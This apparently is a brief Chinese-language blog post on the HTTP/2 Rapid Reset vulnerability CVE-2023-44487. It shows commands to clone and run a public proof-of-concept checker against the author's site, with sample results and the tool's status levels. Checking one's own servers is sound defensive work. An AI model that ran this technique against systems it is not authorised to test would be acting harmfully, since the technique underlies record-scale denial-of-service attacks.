CVE-2023-44487 相關說明可以參考 > iThome

GoogleCloudflare Amazon Web Services(AWS)本周二(10/10)分別公布了涉及HTTP/2協定的CVE-2023-44487零時差安全漏洞,原因是它們在今年的8月至10月間,全都面臨了肇因於該漏洞的分散式服務阻斷(DDoS)攻擊,且其攻擊規模對上述業者來說皆為史上最大,例如Google所緩解的攻擊流量達到每秒3.98億次的請求,是Google上一個紀錄的7.5倍。

底下直接測 POC /CVE-2023-44487

git clone https://github.com/bcdannyboy/CVE-2023-44487.git
cd CVE-2023-44487
python3 -m pip install -r requirements.txt
cat <<EOF>input_urls.txt
https://ssorc.tw
EOF
python3 cve202344487.py -i input_urls.txt -o output_results.csv

結果 more output_results.csv

POSSIBLE !!!!!?

2023-10-13 09:24:46,x.x.x.x,x.x.x.x,https://ssorc.tw,POSSIBLE,Failed to send RST_STREAM: send_rst_stream_h2 - 3

 

SAFE !

2023-10-13 09:24:47,x.x.x.x,x.x.x.x,https://xxxxxxxx.com.tw,SAFE,Downgraded to HTTP/1.1

 

等級分 ↓

Vulnerability Status: "VULNERABLE"/"LIKELY"/"POSSIBLE"/"SAFE"/"ERROR"

要滿 VULNERABLE 才中標